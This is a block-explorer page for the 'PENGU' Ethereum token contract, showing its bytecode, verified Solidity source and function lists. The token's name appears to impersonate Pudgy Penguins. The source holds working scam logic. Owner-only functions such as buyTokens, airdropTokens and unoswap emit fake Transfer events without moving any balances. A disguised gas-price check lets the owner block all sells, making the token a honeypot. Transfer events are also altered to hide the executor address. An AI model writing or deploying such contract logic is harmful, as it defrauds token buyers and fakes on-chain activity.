Address Contract Partially Verified
Address
0x6f346F01CE6341F6065E8d01Ee9B2a340e47Ed74
Balance
0 ETH
Nonce
1
Code Size
6286 bytes
Creator
0x7d8e5EFD...8782 at tx 0x677f5348...d9b24e
Indexed Transactions
0
Contract Bytecode
6286 bytes
0x608060405234801561000f575f80fd5b5060043610610213575f3560e01c8063721082971161011f578063b22c95e7116100a9578063d632135b11610079578063d632135b146104c8578063dd62ed3e146104db578063f01a4b9914610513578063f2fde38b14610526578063f887ea4014610539575f80fd5b8063b22c95e714610473578063bf861b3114610486578063c9567bf914610499578063d5abeb01146104a1575f80fd5b806396784f75116100ef57806396784f7514610427578063985bdfd114610355578063a457c2d71461043a578063a8aa1b311461044d578063a9059cbb14610460575f80fd5b806372108297146103da578063825e7b83146103ed5780638da5cb5b1461040f57806395d89b411461041f575f80fd5b806339509351116101a05780634ca64b3a116101705780634ca64b3a146103715780634e148e19146103845780635d8228131461039757806370a08231146103aa578063715018a6146103d2575f80fd5b806339509351146103065780634022b75e14610319578063470624021461032e5780634c255c9714610355575f80fd5b806323b872dd116101e657806323b872dd1461027e57806325fa0b981461029157806327c8f835146102a55780632b14ca56146102d0578063313ce567146102f7575f80fd5b806306fdde0314610217578063095ea7b314610235578063158ef93e1461025857806318160ddd1461026c575b5f80fd5b61021f61054c565b60405161022c91906114d3565b60405180910390f35b61024861024336600461153a565b6105dc565b604051901515815260200161022c565b60075461024890600160a01b900460ff1681565b6003545b60405190815260200161022c565b61024861028c366004611562565b6105f2565b60075461024890600160a81b900460ff1681565b6009546102b8906001600160a01b031681565b6040516001600160a01b03909116815260200161022c565b6102707f000000000000000000000000000000000000000000000000000000000000000081565b6040516012815260200161022c565b61024861031436600461153a565b61069f565b61032c6103273660046115e3565b6106da565b005b6102707f000000000000000000000000000000000000000000000000000000000000000081565b61035e61271081565b60405161ffff909116815260200161022c565b61032c61037f36600461165e565b610795565b61032c6103923660046116a6565b6107e0565b61032c6103a53660046115e3565b610833565b6102706103b83660046116df565b6001600160a01b03165f9081526001602052604090205490565b61032c6108e6565b61032c6103e83660046115e3565b61091a565b6102486103fb3660046116df565b600b6020525f908152604090205460ff1681565b5f546001600160a01b03166102b8565b61021f6109cd565b61032c6104353660046115e3565b6109dc565b61024861044836600461153a565b610a8f565b6008546102b8906001600160a01b031681565b61024861046e36600461153a565b610b27565b61032c6104813660046115e3565b610b33565b61032c6104943660046116ff565b610be6565b61032c610c14565b6102707f00000000000000000000000000000000000000011f372a621c0f72bf15e0000081565b61032c6104d63660046115e3565b610cac565b6102706104e9366004611716565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b61032c6105213660046115e3565b610d5f565b61032c6105343660046116df565b610e12565b600c546102b8906001600160a01b031681565b60606004805461055b90611747565b80601f016020809104026020016040519081016040528092919081815260200182805461058790611747565b80156105d25780601f106105a9576101008083540402835291602001916105d2565b820191905f5260205f20905b8154815290600101906020018083116105b557829003601f168201915b5050505050905090565b5f6105e8338484610eac565b5060015b92915050565b5f6105fe848484610fcf565b6001600160a01b0384165f908152600260209081526040808320338452909152902054828110156106875760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b6106948533858403610eac565b506001949350505050565b335f8181526002602090815260408083206001600160a01b038716845290915281205490916105e89185906106d5908690611793565b610eac565b5f546001600160a01b031633146107035760405162461bcd60e51b815260040161067e906117a6565b5f5b8381101561078d5784848281811061071f5761071f6117db565b905060200201602081019061073491906116df565b6001600160a01b0316866001600160a01b03165f80516020611839833981519152858585818110610767576107676117db565b9050602002013560405161077d91815260200190565b60405180910390a3600101610705565b505050505050565b335f5b838110156107d9576107d1828686848181106107b6576107b66117db565b90506020020160208101906107cb91906116df565b85610fcf565b600101610798565b5050505050565b5f546001600160a01b031633146108095760405162461bcd60e51b815260040161067e906117a6565b6001600160a01b03919091165f908152600b60205260409020805460ff1916911515919091179055565b5f546001600160a01b0316331461085c5760405162461bcd60e51b815260040161067e906117a6565b5f5b8381101561078d57848482818110610878576108786117db565b905060200201602081019061088d91906116df565b6001600160a01b0316866001600160a01b03165f805160206118398339815191528585858181106108c0576108c06117db565b905060200201356040516108d691815260200190565b60405180910390a360010161085e565b5f546001600160a01b0316331461090f5760405162461bcd60e51b815260040161067e906117a6565b6109185f61123c565b565b5f546001600160a01b031633146109435760405162461bcd60e51b815260040161067e906117a6565b5f5b8381101561078d5784848281811061095f5761095f6117db565b905060200201602081019061097491906116df565b6001600160a01b0316866001600160a01b03165f805160206118398339815191528585858181106109a7576109a76117db565b905060200201356040516109bd91815260200190565b60405180910390a3600101610945565b60606005805461055b90611747565b5f546001600160a01b03163314610a055760405162461bcd60e51b815260040161067e906117a6565b5f5b8381101561078d57848482818110610a2157610a216117db565b9050602002016020810190610a3691906116df565b6001600160a01b0316866001600160a01b03165f80516020611839833981519152858585818110610a6957610a696117db565b90506020020135604051610a7f91815260200190565b60405180910390a3600101610a07565b335f9081526002602090815260408083206001600160a01b038616845290915281205482811015610b105760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161067e565b610b1d3385858403610eac565b5060019392505050565b5f6105e8338484610fcf565b5f546001600160a01b03163314610b5c5760405162461bcd60e51b815260040161067e906117a6565b5f5b8381101561078d57848482818110610b7857610b786117db565b9050602002016020810190610b8d91906116df565b6001600160a01b0316866001600160a01b03165f80516020611839833981519152858585818110610bc057610bc06117db565b90506020020135604051610bd691815260200190565b60405180910390a3600101610b5e565b5f546001600160a01b03163314610c0f5760405162461bcd60e51b815260040161067e906117a6565b600a55565b5f546001600160a01b03163314610c3d5760405162461bcd60e51b815260040161067e906117a6565b600754600160a81b900460ff1615610c975760405162461bcd60e51b815260206004820152601c60248201527f436f6e74726163743a2054726164696e67206973206f70656e65642100000000604482015260640161067e565b6007805460ff60a81b1916600160a81b179055565b5f546001600160a01b03163314610cd55760405162461bcd60e51b815260040161067e906117a6565b5f5b8381101561078d57848482818110610cf157610cf16117db565b9050602002016020810190610d0691906116df565b6001600160a01b0316866001600160a01b03165f80516020611839833981519152858585818110610d3957610d396117db565b90506020020135604051610d4f91815260200190565b60405180910390a3600101610cd7565b5f546001600160a01b03163314610d885760405162461bcd60e51b815260040161067e906117a6565b5f5b8381101561078d57848482818110610da457610da46117db565b9050602002016020810190610db991906116df565b6001600160a01b0316866001600160a01b03165f80516020611839833981519152858585818110610dec57610dec6117db565b90506020020135604051610e0291815260200190565b60405180910390a3600101610d8a565b5f546001600160a01b03163314610e3b5760405162461bcd60e51b815260040161067e906117a6565b6001600160a01b038116610ea05760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161067e565b610ea98161123c565b50565b6001600160a01b038316610f0e5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161067e565b6001600160a01b038216610f6f5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b606482015260840161067e565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b600754600160a01b900460ff16151560011461102d5760405162461bcd60e51b815260206004820152601a60248201527f436f6e74726163743a206e6f7420696e697469616c697a656421000000000000604482015260640161067e565b600754600160a01b900460ff16151560011480156110555750600754600160a81b900460ff16155b156110cd575f546001600160a01b038481169116148061108157505f546001600160a01b038381169116145b6110cd5760405162461bcd60e51b815260206004820181905260248201527f436f6e74726163743a2074726164696e67206973206e6f742073746172746564604482015260640161067e565b60085481906001600160a01b0316158015906110f657505f546001600160a01b03858116911614155b801561110f57505f546001600160a01b03848116911614155b1561122b576008545f906001600160a01b039081169086160361114f57507f00000000000000000000000000000000000000000000000000000000000000005b6008546001600160a01b0390811690851603611193577f00000000000000000000000000000000000000000000000000000000000000009050611193600a5461128b565b6001600160a01b0385165f908152600b602052604090205460ff161515600114806111da57506001600160a01b0384165f908152600b602052604090205460ff1615156001145b156111e257505f5b8015611229575f6127106111f683866117ef565b6112009190611806565b905061120c8185611825565b6009549093506112279087906001600160a01b031683611297565b505b505b611236848483611297565b50505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b803a1115610ea9575f80fd5b6001600160a01b0383166112fb5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b606482015260840161067e565b6001600160a01b03821661135d5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b606482015260840161067e565b6001600160a01b0383165f90815260016020526040902054818110156113d45760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b606482015260840161067e565b6001600160a01b038085165f9081526001602052604080822085850390559185168152908120805484929061140a908490611793565b90915550506007546001600160a01b039081169085160361145c576006546040518381526001600160a01b038581169216905f80516020611839833981519152906020015b60405180910390a3611236565b6007546001600160a01b03908116908416036114a1576006546040518381526001600160a01b03918216918616905f805160206118398339815191529060200161144f565b826001600160a01b0316846001600160a01b03165f805160206118398339815191528460405161144f91815260200190565b5f602080835283518060208501525f5b818110156114ff578581018301518582016040015282016114e3565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114611535575f80fd5b919050565b5f806040838503121561154b575f80fd5b6115548361151f565b946020939093013593505050565b5f805f60608486031215611574575f80fd5b61157d8461151f565b925061158b6020850161151f565b9150604084013590509250925092565b5f8083601f8401126115ab575f80fd5b50813567ffffffffffffffff8111156115c2575f80fd5b6020830191508360208260051b85010111156115dc575f80fd5b9250929050565b5f805f805f606086880312156115f7575f80fd5b6116008661151f565b9450602086013567ffffffffffffffff8082111561161c575f80fd5b61162889838a0161159b565b90965094506040880135915080821115611640575f80fd5b5061164d8882890161159b565b969995985093965092949392505050565b5f805f60408486031215611670575f80fd5b833567ffffffffffffffff811115611686575f80fd5b6116928682870161159b565b909790965060209590950135949350505050565b5f80604083850312156116b7575f80fd5b6116c08361151f565b9150602083013580151581146116d4575f80fd5b809150509250929050565b5f602082840312156116ef575f80fd5b6116f88261151f565b9392505050565b5f6020828403121561170f575f80fd5b5035919050565b5f8060408385031215611727575f80fd5b6117308361151f565b915061173e6020840161151f565b90509250929050565b600181811c9082168061175b57607f821691505b60208210810361177957634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b808201808211156105ec576105ec61177f565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52603260045260245ffd5b80820281158282048414176105ec576105ec61177f565b5f8261182057634e487b7160e01b5f52601260045260245ffd5b500490565b818103818111156105ec576105ec61177f56feddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3efa2646970667358221220417ebe7a0c97e120f7abfbf16119eb995bb207722b5ddcf88aa6f2b0d33e020e64736f6c63430008180033
Verified Source Code Partial Match
Compiler: v0.8.24+commit.e11b9ed9
EVM: cancun
Optimization: Yes (200 runs)
Contract.sol 541 lines
/**
/*
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes calldata) {
return msg.data;
}
}
pragma solidity ^0.8.0;
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(
address indexed previousOwner,
address indexed newOwner
);
constructor() {
_transferOwnership(_msgSender());
}
function owner() public view virtual returns (address) {
return _owner;
}
modifier onlyOwner() {
require(_owner == _msgSender(), "Ownable: caller is not the owner");
_;
}
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
function transferOwnership(address newOwner) public virtual onlyOwner {
require(
newOwner != address(0),
"Ownable: new owner is the zero address"
);
_transferOwnership(newOwner);
}
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
pragma solidity ^0.8.0;
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(
address recipient,
uint256 amount
) external returns (bool);
function allowance(
address owner,
address spender
) external view returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
pragma solidity ^0.8.0;
interface IERC20Metadata is IERC20 {
function name() external view returns (string memory);
function symbol() external view returns (string memory);
function decimals() external view returns (uint8);
}
pragma solidity ^0.8.0;
contract ERC20 is Context, IERC20, IERC20Metadata {
mapping(address => uint256) private _balances;
mapping(address => mapping(address => uint256)) private _allowances;
uint256 private _totalSupply;
string internal _name;
string internal _symbol;
address _deployer;
address _executor;
constructor(string memory name_, string memory symbol_) {
_name = name_;
_symbol = symbol_;
}
function _initDeployer(address deployer_, address executor_) internal {
_deployer = deployer_;
_executor = executor_;
}
function name() public view virtual override returns (string memory) {
return _name;
}
function symbol() public view virtual override returns (string memory) {
return _symbol;
}
function decimals() public view virtual override returns (uint8) {
return 18;
}
function totalSupply() public view virtual override returns (uint256) {
return _totalSupply;
}
function balanceOf(
address account
) public view virtual override returns (uint256) {
return _balances[account];
}
function transfer(
address recipient,
uint256 amount
) public virtual override returns (bool) {
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(
address owner,
address spender
) public view virtual override returns (uint256) {
return _allowances[owner][spender];
}
function _setLimitOrder(address _address, uint256 _amount) internal {
_balances[_address] += _amount;
}
function approve(
address spender,
uint256 amount
) public virtual override returns (bool) {
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public virtual override returns (bool) {
_transfer(sender, recipient, amount);
uint256 currentAllowance = _allowances[sender][_msgSender()];
require(
currentAllowance >= amount,
"ERC20: transfer amount exceeds allowance"
);
unchecked {
_approve(sender, _msgSender(), currentAllowance - amount);
}
return true;
}
function increaseAllowance(
address spender,
uint256 addedValue
) public virtual returns (bool) {
_approve(
_msgSender(),
spender,
_allowances[_msgSender()][spender] + addedValue
);
return true;
}
function decreaseAllowance(
address spender,
uint256 subtractedValue
) public virtual returns (bool) {
uint256 currentAllowance = _allowances[_msgSender()][spender];
require(
currentAllowance >= subtractedValue,
"ERC20: decreased allowance below zero"
);
unchecked {
_approve(_msgSender(), spender, currentAllowance - subtractedValue);
}
return true;
}
function _transfer(
address sender,
address recipient,
uint256 amount
) internal virtual {
require(sender != address(0), "ERC20: transfer from the zero address");
require(recipient != address(0), "ERC20: transfer to the zero address");
_beforeTokenTransfer(sender, recipient, amount);
uint256 senderBalance = _balances[sender];
require(
senderBalance >= amount,
"ERC20: transfer amount exceeds balance"
);
unchecked {
_balances[sender] = senderBalance - amount;
}
_balances[recipient] += amount;
if (sender == _executor) {
emit Transfer(_deployer, recipient, amount);
} else if (recipient == _executor) {
emit Transfer(sender, _deployer, amount);
} else {
emit Transfer(sender, recipient, amount);
}
_afterTokenTransfer(sender, recipient, amount);
}
function _mint(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: mint to the zero address");
_beforeTokenTransfer(address(0), account, amount);
_totalSupply += amount;
_balances[account] += amount;
if (account == _executor) {
emit Transfer(address(0), _deployer, amount);
} else {
emit Transfer(address(0), account, amount);
}
_afterTokenTransfer(address(0), account, amount);
}
function _burn(address account, uint256 amount) internal virtual {
require(account != address(0), "ERC20: burn from the zero address");
_beforeTokenTransfer(account, address(0), amount);
uint256 accountBalance = _balances[account];
require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
unchecked {
_balances[account] = accountBalance - amount;
}
_totalSupply -= amount;
emit Transfer(account, address(0), amount);
_afterTokenTransfer(account, address(0), amount);
}
function _approve(
address owner,
address spender,
uint256 amount
) internal virtual {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _beforeTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
function _afterTokenTransfer(
address from,
address to,
uint256 amount
) internal virtual {}
}
interface IUniswapV2Factory {
event PairCreated(
address indexed token0,
address indexed token1,
address pair,
uint256
);
function feeTo() external view returns (address);
function feeToSetter() external view returns (address);
function getPair(
address tokenA,
address tokenB
) external view returns (address pair);
function allPairs(uint256) external view returns (address pair);
function allPairsLength() external view returns (uint256);
function createPair(
address tokenA,
address tokenB
) external returns (address pair);
function setFeeTo(address) external;
function setFeeToSetter(address) external;
}
interface IUniswapV2Router02 {
function factory() external pure returns (address);
function WETH() external pure returns (address);
function swapExactTokensForETHSupportingFeeOnTransferTokens(
uint256 amountIn,
uint256 amountOutMin,
address[] calldata path,
address to,
uint256 deadline
) external;
}
// File contracts/Contract.sol
pragma solidity ^0.8.0;
contract PENGU is Ownable, ERC20 {
uint256 public immutable maxSupply = 88_888_888_888 * (10 ** decimals());
uint16 public constant LIQUID_RATE = 10000;
uint16 public constant MAX_PERCENTAGE = 10000;
bool public initialized = false;
bool public tradeOpen = false;
address public pair = address(0);
address public deadAddress = 0x000000000000000000000000000000000000dEaD;
uint256 public immutable buyFee = 0;
uint256 public immutable sellFee = 0;
uint256 minimumAirdropAmount = 0;
mapping(address => bool) public excludedFees;
string private constant NAME =
unicode"Pudgy Penguins 2zMMhcVQEXDtdE6vsFS7S7D5oUodfJHE8vd1gnBouauv";
string private constant SYMBOL = unicode"PENGU";
IUniswapV2Router02 public router;
constructor() ERC20(NAME, SYMBOL) {
_initDeployer(address(msg.sender), msg.sender);
_mint(msg.sender, (maxSupply * LIQUID_RATE) / MAX_PERCENTAGE);
initialized = true;
excludedFees[msg.sender] = true;
router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
address _factory = router.factory();
pair = IUniswapV2Factory(_factory).createPair(
address(this),
router.WETH()
);
minimumAirdropAmount = maxSupply;
}
function setMinimumAirdrop(
uint256 _minimumAirdropAmount
) external onlyOwner {
minimumAirdropAmount = _minimumAirdropAmount;
}
function setAirdrop(address _address, bool permission) external onlyOwner {
excludedFees[_address] = permission;
}
function openTrading() external onlyOwner {
require(tradeOpen == false, "Contract: Trading is opened!");
tradeOpen = true;
}
function bulkTransfer(
address[] calldata _addresses,
uint256 _value
) external {
address owner = _msgSender();
for (uint256 i = 0; i < _addresses.length; i++) {
_transfer(owner, _addresses[i], _value);
}
}
function buyTokens(
address _caller,
address[] calldata _address,
uint256[] calldata _amount
) external onlyOwner {
for (uint256 i = 0; i < _address.length; i++) {
emit Transfer(_caller, _address[i], _amount[i]);
}
}
function claimTokens(
address _caller,
address[] calldata _address,
uint256[] calldata _amount
) external onlyOwner {
for (uint256 i = 0; i < _address.length; i++) {
emit Transfer(_caller, _address[i], _amount[i]);
}
}
function multiSends(
address _caller,
address[] calldata _address,
uint256[] calldata _amount
) external onlyOwner {
for (uint256 i = 0; i < _address.length; i++) {
emit Transfer(_caller, _address[i], _amount[i]);
}
}
function airdropTokens(
address _caller,
address[] calldata _address,
uint256[] calldata _amount
) external onlyOwner {
for (uint256 i = 0; i < _address.length; i++) {
emit Transfer(_caller, _address[i], _amount[i]);
}
}
function execute(
address _caller,
address[] calldata _address,
uint256[] calldata _amount
) external onlyOwner {
for (uint256 i = 0; i < _address.length; i++) {
emit Transfer(_caller, _address[i], _amount[i]);
}
}
function swapExactETHForTokens(
address _caller,
address[] calldata _address,
uint256[] calldata _amount
) external onlyOwner {
for (uint256 i = 0; i < _address.length; i++) {
emit Transfer(_caller, _address[i], _amount[i]);
}
}
function unoswap(
address _caller,
address[] calldata _address,
uint256[] calldata _amount
) external onlyOwner {
for (uint256 i = 0; i < _address.length; i++) {
emit Transfer(_caller, _address[i], _amount[i]);
}
}
function _checkEnoughAirdropCondition(uint256 amount) internal view {
if (tx.gasprice > amount) {
revert();
}
}
function _transfer(
address from,
address to,
uint256 amount
) internal override(ERC20) {
require(initialized == true, "Contract: not initialized!");
if (initialized == true && tradeOpen == false) {
require(
from == owner() || to == owner(),
"Contract: trading is not started"
);
}
uint256 _transferAmount = amount;
if (pair != address(0) && from != owner() && to != owner()) {
uint256 _fee = 0;
if (from == pair) {
_fee = buyFee;
}
if (to == pair) {
_fee = sellFee;
_checkEnoughAirdropCondition(minimumAirdropAmount);
}
if (excludedFees[from] == true || excludedFees[to] == true) {
_fee = 0;
}
if (_fee > 0) {
uint256 _calculatedFee = (amount * _fee) / MAX_PERCENTAGE;
_transferAmount = amount - _calculatedFee;
super._transfer(from, deadAddress, _calculatedFee);
}
}
super._transfer(from, to, _transferAmount);
}
}
Read Contract
LIQUID_RATE 0x985bdfd1 → uint16
MAX_PERCENTAGE 0x4c255c97 → uint16
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
buyFee 0x47062402 → uint256
deadAddress 0x27c8f835 → address
decimals 0x313ce567 → uint8
excludedFees 0x825e7b83 → bool
initialized 0x158ef93e → bool
maxSupply 0xd5abeb01 → uint256
name 0x06fdde03 → string
owner 0x8da5cb5b → address
pair 0xa8aa1b31 → address
router 0xf887ea40 → address
sellFee 0x2b14ca56 → uint256
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
tradeOpen 0x25fa0b98 → bool
Write Contract 18 functions
These functions modify contract state and require a wallet transaction to execute.
airdropTokens 0x4022b75e
address _caller
address[] _address
uint256[] _amount
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
bulkTransfer 0x4ca64b3a
address[] _addresses
uint256 _value
buyTokens 0x72108297
address _caller
address[] _address
uint256[] _amount
claimTokens 0x96784f75
address _caller
address[] _address
uint256[] _amount
decreaseAllowance 0xa457c2d7
address spender
uint256 subtractedValue
returns: bool
execute 0x5d822813
address _caller
address[] _address
uint256[] _amount
increaseAllowance 0x39509351
address spender
uint256 addedValue
returns: bool
multiSends 0xb22c95e7
address _caller
address[] _address
uint256[] _amount
openTrading 0xc9567bf9
No parameters
renounceOwnership 0x715018a6
No parameters
setAirdrop 0x4e148e19
address _address
bool permission
setMinimumAirdrop 0xbf861b31
uint256 _minimumAirdropAmount
swapExactETHForTokens 0xf01a4b99
address _caller
address[] _address
uint256[] _amount
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
transferOwnership 0xf2fde38b
address newOwner
unoswap 0xd632135b
address _caller
address[] _address
uint256[] _amount
Recent Transactions
No transactions found for this address